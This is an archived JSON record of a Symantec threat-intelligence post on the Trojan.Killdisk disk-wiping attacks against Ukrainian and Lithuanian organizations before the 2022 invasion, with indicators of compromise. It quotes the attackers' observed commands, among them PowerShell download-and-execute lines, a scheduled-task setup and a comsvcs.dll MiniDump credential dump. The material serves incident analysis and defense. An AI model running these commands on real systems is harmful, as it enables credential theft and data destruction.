{
	"id": "3a4b7f7e-03ea-4969-a7b6-0a87f1ac394a",
	"created_at": "2026-04-06T00:16:10.586865Z",
	"updated_at": "2026-04-10T13:12:13.967512Z",
	"deleted_at": null,
	"sha1_hash": "3b7613b1af9f781d2155dc35e4b6fd1e60c7879c",
	"title": "Ukraine: Disk-wiping Attacks Precede Russian Invasion",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 60562,
	"plain_text": "Ukraine: Disk-wiping Attacks Precede Russian Invasion\r\nBy About the Author\r\nArchived: 2026-04-05 19:57:26 UTC\r\nUPDATE February 24, 2022, 13:42: This blog has been updated with details about ransomware being used as a\r\npossible decoy during some wiper attacks.\r\nUPDATE February 25, 2022, 17:00: This blog has been updated with details on how a known Microsoft SQL Server \r\nvulnerability (CVE-2021-1636) was exploited in at least one attack.\r\nA new form of disk-wiping malware (Trojan.Killdisk) was used to attack organizations in Ukraine shortly before the\r\nlaunch of a Russian invasion this morning (February 24). Symantec, a division of Broadcom Software, has also found\r\nevidence of wiper attacks against machines in Lithuania. Sectors targeted included organizations in the financial,\r\ndefense, aviation, and IT services sectors.\r\nTrojan.Killdisk comes in the form of an executable file, which is signed by a certificate issued to Hermetica Digital Ltd.\r\nIt contains 32-bit and 64-bit driver files which are compressed by the Lempel-Ziv algorithm stored in their resource\r\nsection. The driver files are signed by a certificate issued to EaseUS Partition Master. The malware will drop the\r\ncorresponding file according to the operating system (OS) version of the infected system. Driver file names are\r\ngenerated using the Process ID of the wiper\r\nOnce run, the wiper will damage the Master Boot Record (MBR) of the infected computer, rendering it inoperable. The\r\nwiper does not appear to have any additional functionality beyond its destructive capabilities.\r\nAttack chain\r\nInitial indications suggest that the attacks may have been in preparation for some time. Temporal evidence points to\r\npotentially related malicious activity beginning as early as November 2021. However, we are continuing to review and\r\nverify findings.\r\nIn the case of an attack against one organization in Ukraine, the attackers appear to have gained access to the network on\r\nDecember 23, 2021, via malicious SMB activity against a Microsoft Exchange Server. This was immediately followed\r\nby credential theft. A web shell was also installed on January 16, before the wiper was deployed on February 23.\r\nAn organization in Lithuania was compromised from at least November 12, 2021, onwards. It appears the attackers may\r\nhave leveraged a Tomcat exploit in order to execute a PowerShell command. The decoded PowerShell was used to\r\ndownload a JPEG file from an internal server, on the victim’s network.\r\ncmd.exe /Q /c powershell -c \"(New-Object\r\nSystem.Net.WebClient).DownloadFile('hxxp://192.168.3.13/email.jpeg','CSIDL_SYSTEM_DRIVE\\temp\\sys.tmp1')\"\r\n1\u003e \\\\127.0.0.1\\ADMIN$\\__1636727589.6007507 2\u003e\u00261\r\nA minute later, the attackers created a scheduled task to execute a suspicious ‘postgresql.exe’ file, weekly on a\r\nWednesday, specifically at 11:05 local-time. The attackers then ran this scheduled task to execute the task.\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia\r\nPage 1 of 3\n\ncmd.exe /Q /c move CSIDL_SYSTEM_DRIVE\\temp\\sys.tmp1\r\nCSIDL_WINDOWS\\policydefinitions\\postgresql.exe 1\u003e \\\\127.0.0.1\\ADMIN$\\__1636727589.6007507 2\u003e\u00261\r\nschtasks /run /tn \"\\Microsoft\\Windows\\termsrv\\licensing\\TlsAccess\"\r\nNine minutes later, the attackers modified the scheduled task to execute the same postgres.exe file at 09:30 local-time\r\ninstead.\r\nBeginning on February 22, Symantec observed the file ‘postgresql.exe’ being executed and used to perform the\r\nfollowing:\r\nExecute certutil to check connectivity to trustsecpro[.]com and whatismyip[.]com\r\nExecute a PowerShell command to download another JPEG file from a compromised web server -\r\nconfluence[.]novus[.]ua\r\nFollowing this activity, PowerShell was used to dump credentials from the compromised machine:\r\ncmd.exe /Q /c powershell -c \"rundll32 C:\\windows\\system32\\comsvcs.dll MiniDump 600\r\nC:\\asm\\appdata\\local\\microsoft\\windows\\winupd.log full\" 1\u003e \\\\127.0.0.1\\ADMIN$\\__1638457529.1247072\r\n2\u003e\u00261\r\nLater, following the above activity, several unknown PowerShell scripts were executed.\r\npowershell -v 2 -exec bypass -File text.ps1\r\npowershell -exec bypass gp.ps1\r\npowershell -exec bypass -File link.ps1\r\nFive minutes later, the wiper (Trojan.KillDisk) was deployed.\r\nSQL Server exploit\r\nThe attackers appear to have used an exploit of a known vulnerability in Microsoft SQL Server (CVE-2021-1636) in\r\norder to compromise at least one of the targeted organisations. In an attack against an organization in Ukraine, the\r\nfollowing process lineage was used to execute the “whoami” command on November 11 2021:\r\nCSIDL_SYSTEM_DRIVE\\program files\\microsoft sql\r\nserver\\mssql12.mssqlserver\\mssql\\binn\\sqlservr.exe,CSIDL_SYSTEM\\services.exe,CSIDL_SYSTEM\\wininit.exe\r\nThe next day, the same process lineage was responsible for executing the following PowerShell command:\r\n(New-Object System.Net.WebClient).DownloadFile('hxxp://[INTERNAL_HOST]/label.ico','C:\\temp\\sys.tmp1')\r\nThe organization was running an unpatched version of Microsoft SQL Server.\r\nRansomware decoy\r\nIn several attacks Symantec has investigated to date, ransomware was also deployed against affected organizations at the\r\nsame time as the wiper. As with the wiper, scheduled tasks were used to deploy the ransomware. File names used by the\r\nransomware included client.exe, cdir.exe, cname.exe, connh.exe, and intpub.exe.  It appears likely that the ransomware\r\nwas used as a decoy or distraction from the wiper attacks. This has some similarities to the earlier WhisperGate wiper\r\nattacks against Ukraine, where the wiper was disguised as ransomware.\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia\r\nPage 2 of 3\n\nDeveloping situation\r\nWith an invasion now underway, there remains a high likelihood of further cyber attacks against Ukraine and other\r\ncountries in the region. Symantec’s Threat Hunter Team will continue to actively monitor the situation and post updates\r\nto this blog if new information becomes available.\r\nProtection/Mitigation\r\nSymantec Endpoint products will detect and block this threat using the following signatures:\r\nTrojan.Killdisk\r\nTrojan.Gen.2\r\nTrojan Horse\r\nWs.Malware.2\r\nFor the latest protection updates, please visit the Symantec Protection Bulletin.\r\nIndicators of Compromise\r\nIf an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.\r\n1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591 – Trojan.Killdisk\r\n0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da – Trojan.Killdisk\r\na64c3e0522fad787b95bfb6a30c3aed1b5786e69e88e023c062ec7e5cebf4d3e – Trojan.Killdisk\r\n4dc13bb83a16d4ff9865a51b3e4d24112327c526c1392e14d56f20d6f4eaf382 - Ransomware\r\nSource: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia\r\nPage 3 of 3",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia"
	],
	"report_names": [
		"ukraine-wiper-malware-russia"
	],
	"threat_actors": [],
	"ts_created_at": 1775434570,
	"ts_updated_at": 1775826733,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3b7613b1af9f781d2155dc35e4b6fd1e60c7879c.pdf",
		"text": "https://archive.orkl.eu/3b7613b1af9f781d2155dc35e4b6fd1e60c7879c.txt",
		"img": "https://archive.orkl.eu/3b7613b1af9f781d2155dc35e4b6fd1e60c7879c.jpg"
	}
}